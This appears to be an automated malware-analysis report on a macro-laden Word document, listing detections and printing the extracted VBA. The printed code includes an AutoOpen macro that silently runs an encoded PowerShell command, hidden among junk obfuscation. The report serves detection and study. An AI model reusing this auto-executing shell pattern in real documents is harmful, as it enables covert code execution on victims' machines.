Verdict: MALICIOUS
Risk Score: 308

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of a Shell() call and PowerShell references within the VBA code, specifically within an AutoOpen macro. This suggests the document is designed to execute arbitrary commands, likely to download and execute a second-stage payload, aligning with the typical behavior of macro-based malware.
Heuristics (8)

- ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `On Error Resume Next VBA.Shell$ "" + "powershell -e YWJjZA==", 0 End Function`
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched line in script: `On Error Resume Next VBA.Shell$ "" + "powershell -e YWJjZA==", 0 End Function`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub autoopen() MfKEFtN`
- Reference to PowerShell (high, SC_STR_POWERSHELL)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7902 bytes |

SHA-256 (macros.bas): 161c33eed9ddc2cf24679a6f424a630a4dae0ca7d40fcdf3365c778123dda2f4

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub MRfF227()
On Error Resume Next
Do
Select Case pKQixBx
Case 18793868
HrCrIlf = CBool(65 - CSng(vuAl - Round(558) - beAC / CLng(11 * Rnd(171417130))))
yJEO967Y6 = 9203
Case 5
bHmbEY = Int(532772391)
kIUWfo8K = Int(tYFk813D3)
End Select
Dim seH()
ReDim seH(2)
seH(0) = 264849359
seH(1) = 33098296
Select Case CZk
Case 346281819
ZIj = Hex(43848039 - ChrW(dbS) / 7 * ZveT8T2H9)
CreK9UY6 = Sqr(kORo485V8 + CByte(365104055 + Round(9041 / Log(8) / TKl - ChrW(51))) / KBoC6f220 + JSvX78At)
kHgLw2 = Int(9434)
Case 6
kLF = Fix(vaKp7)
LwzTji = CBool(eiug7)
zvbH5M = jUNFrPs
Case 2986
YMRS = 29
eXG = Round(232952633)
OgyR13aJ = Hex(1)
End Select
Set aGj = MeMG01
Loop Until TMGC15d <> ptHmBrqQE
Do
oMQY = Sin(406004041 - Chr(fbIQV / CByte(7 / hyGB) - 3 * Round(5 * BteDKgp)) - nRQrs3S + CDate(467260834 + ChrB(bUHdH)))
qPxG = fbeZx1C + 536281499
hNlToXE0 = (3276 / CStr(enjV87yY - Rnd(9)) * 52 / CInt(985 + Hex(1 * 21) / 5 * CInt(hDQS - CByte(598))) * Iblb0 - Chr(CcX))
Do
BSCB5965 = CDbl(96)
Loop Until KAjc8 <= DOc
KIlFg1 = (yuTRu0wQ6 / PlGJ5x6T - (560 - ChrB(teIy) - NRSdnP + CByte(4680) / (Rqm * Tan(90) * (9669 + CLng(JDmPeCwhZ - Int(jWvF2)) - RNgDS4h5y * 3))))
Loop Until yQIY8htto Or 5
rjoG1P = MmD - oHh
End Sub
Sub VXnWm(JRmm4h)
On Error Resume Next
If hfuM8 Or tHTPP Then
Do
vswXP9rWb = gbej4mY7n + Int(8105) / jkLO * Hex(KKG / Atn(9)) / RhT - Fix(670)
Loop Until lmHoU0o Or RVqCq4Do7
If nLFz Eqv hkUu201R Then
LTl = CBool(250089612)
End If
ElseIf YQPf Xor EbhQ62 Then
Do While GrhR And qjnU6q
ygJXK = 512374437
Loop
Vyo = (IaG + CDate(8 / RwVB26 - jttkjmQ / Sqr(onOb9Gx)) + KBvgz - ChrB(71) - cgtv45 + 96 + JYmphtI69 / sIm + 5 - Oct(bJhbnw0c / CStr(TWTb7B) * 70 - CDate(IlBx)) * 30 * Oct(eOjzJ54ai))
End If
Select Case XZZT9z
Case 918
KfOAFH6Iu = CDbl(284685011)
GBALw9E10 = CLng(305749864)
zhqEWH = Hex(3424 - ajwHo0T1)
Case 9
taOh = ZBluh
bXIl9a = QrMCX589Y
xPCU66c = CByte(6408)
End Select
End Sub
Sub autoopen()
MfKEFtN
End Sub
Sub fduN(OJff)
On Error Resume Next
Do While FLYI7G263 >= 18
qBvlX = MdKK - 21976223
Iavn3u07a = KbVR49F * 189328296
Loop
While oXQibRnr Xor kBlOH01b
Do While EMju8w <> EfNF7
KUa = Atn(80 / Tan(23 - DqU) - CrEK4 - 8951)
Loop
VxlOb167 = tvst2V94 / CLng(4 * ChrB(adNb)) + 448636581 - Tan(94 + Cos(245842808)) / 356 - Round(xSz) / yWxu52I + CDbl(GBFV4aDL) - 1229 * Sin(425 + Log(304096732)) / (JxnL2 / CDbl(1 + Round(3) / hxTR * Tan(61 + CLng(IvOq016W0 + Atn(cAZ)) * 242025946 - Atn(JCdi337))))
hFNAAo9 = ChrW(cyp + CStr(AwfpV) - kTkBp86 / 6)
Do
VGBC = KxJJnEgZ4 - Rnd(sozb - Oct(HZMd5m2e * CLng(432728309 * CLng(VoNx16))) - Wszwp * 658) * 870 / 193690625 * fXAip91 + Fix(fltHA11H + 701)
Loop Until ePZsCbwig <> 19
While Fsp Or 732
VXQK0 = 92 + Cos(yoEnGnPp / Round(bSr / CStr(VIoP3r2) / 97582935 * LGNO9H) + 533087076 - Chr(ysid7)) * (1 / 890 / 15323515 * CByte(OXqd5) * 186 + 608 + IquI637K / 13 / (9 + mfmt8e7))
Wend
While tjoo6 >= feJk024u
QRuNK9z = (3033 - CDate(322) / 149 / DAOqsNP99) + (UzzoAV8 / Atn(63) - (bGWa2s4T - CDate(5)))
Wend
Wend
ySA = CBool(8)
End Sub
Sub OJcf71T61()
On Error Resume Next
Do While QZciS And 7
For Each skqku3N In UQN
udcBgS = mHuP9FPN8 - CLng(iCip) / QCBd + CDbl(71816958) + 8470 + CLng(UmmI1 - vfjNiv3) - jyJi4 + Log(HeqUMrT4W) + IjsS + Atn(dxRX0g15)
Next
rPXf1I4 = CrlE
BHlI544g8 = RSeD
mgokdB2 = 486058022 * 295585723
Loop
If owYKsh4eZ < UwvHyr Then
While jxYMb70L And XhNmm14x
ltQp = OhcL7Y1D4 - Sin(NKYaXhjJ * Rnd(4) / eoDSNj09 - Hex(fnVH)) + (152736399 + CDbl(8601))
Wend
CPdr5V8M = cBUx0BBw4 + GAYw02J
ElseIf EUha Xor NhTm3C Then
Set rJIa = AnmH3J646
For Each vmjYlP0 In PMSU1
tJiXR = (68 - ChrB(514168117 + Sgn(609 + Int(538 * ChrW(368339161 * CStr(LUzBF2I1B))) * 639 * 528157508) - mUCMF63Y * Round(688)) + (6 - CBool(7260 / Int(378) + dzbB4M / slXZ1) - rxdi - Round(5) / (zmXu + 65)))
Next
End If
End Sub
Public Function MfKEFtN()
On Error Resume Next
VBA.Shell$ "" + "powershell -e YWJjZA==", 0
End Function
Sub YqkwQw2()
On Error Resume Next
Do
Do
zvBF82iy = DZHBB - 70 * YEAv + Sgn(WBGU2E11)
Loop Until uhFb < uNtR965
While nJtGlp3 >= jTklnfsL
LNaVi2 = 521 / sfWck / pceZh415 / ChrW(595 / CInt(2)) - 5 * Round(XZBQf7) - 6800 - CLng(gOjj9b062 + BmKi303D) * 60 / Int(MNQM7744) + (8059 / Tan(XzUIzK6x) / YihiPs6 * CDbl(20776914 * CDate(514113094) + 1 / Round(270060603)))
Wend
veIfF = 815 * Round(iCZNo) + QXTX / 112188161 / (THVDarIU * Sin(GZT))
For Each POPxv4S2 In wOGJ7lj
AHGz = PlXC * Round(455799610) - 2905 / gSDy + (bsxt178U / Round(zQad - mXBXV8) / 89442276 - 657 / (204367578 / CInt(viTv5 * 304) - ViVY4P50 - Fix(313922968)))
Next
rwbd = 240248942 / jcHn5
Loop Until iEmV69 <> iFUQg78
DlNc5422 = (27 - ydEY - RMq / CBool(CMKu4) - (aeKY28n9 / CByte(rRI) + (RcqRp - CBool(LfRI08C8z - ChrB(223481334) * JHK / Sgn(25 - CLng(69))) + (vtuB2oY + ChrW(2935 + CInt(9) + UzjQ * CInt(181911309)) * 665 / Rnd(7)))))
While KWhY1 >= 21
For pCIET = ElOk0BC64 To xEjX07Q
wAGR9 = Cpvr042V / Cos(MqvS7A29 / fpQqDXHF3 - 81 / Atn(1)) / lgbyr3U - Rnd(7) * WFpZx5 * Log(1596 * fqRB)
Next
If PupH01uC <= 14 Then
IGgxO = 807
End If
For BIT = 2418 To 7677
dlkJc7 = zgn * Hex(7745) - 301618901 + Hex(vOfoT5uu) / oOHQ * Oct(89 - Atn(RVuOj1 - Fix(72))) - 68 / Log(SfZnP6) * (kQlG / CStr(4375) / (FUa / CDbl(iwVC) + EebH1l1l2 / Chr(2)))
Next
Wend
End Sub
Sub hwrOJ4(Byv)
On Error Resume Next
If EfvU0ypm >= ceWj6u7 Then
If vtmo > 17 Then
ayk = CSng(kru)
End If
Select Case wjcxxjA
Case 6919
MlVN72x = 326
Ekix12Yh1 = CSng(8)
WbR = Sqr(dufvSoDR)
Case 3
UgBS37 = eaji
xHJiODDFe = CLng(WKK)
hfLIkqA = CByte(15)
End Select
End If
If XLzX0B8 = UvrR60 Then
Select Case ijHdO
Case 867
OhhU9nF = KWbSS1
iaAoX6 = CStr(4)
EtW = Fix(5101 / Round(wnjuo6))
Case 153
eUkB = 1665
VuMG847 = Cos(438249070 + 6)
yWwz5 = Hex(MDiS5K)
Case 40
yOAWD5pS = HCzzWSso
Wio = Sqr(330)
uwC = 3
End Select
While pPt < 6186
XMuq0 = DQz / Round(PzZb6) - PkLI468jd + PjMK5 / 154 / Hex(ucUOAwz0w) - nWW / Fix(TMuj3) / OrpX2 * Sgn(moU) * (ABxD - Atn(4899) - 136094830 * Log(cFLK86e01))
Wend
ElseIf IAV <= 66679749 Then
For Each Qrcxt9Li3 In POgy2N7G
lBeh = 9006 - Fix(brMn9v800) + 45 + Log(QkVr) * sNET41v + CBool(pFfH)
Next
While mPBXlK465 Xor 26
uCDq = jOYl / sUBFo05 - hNZ + Chr(93) - 420140798 - CLng(fVWISB)
Wend
End If
End Sub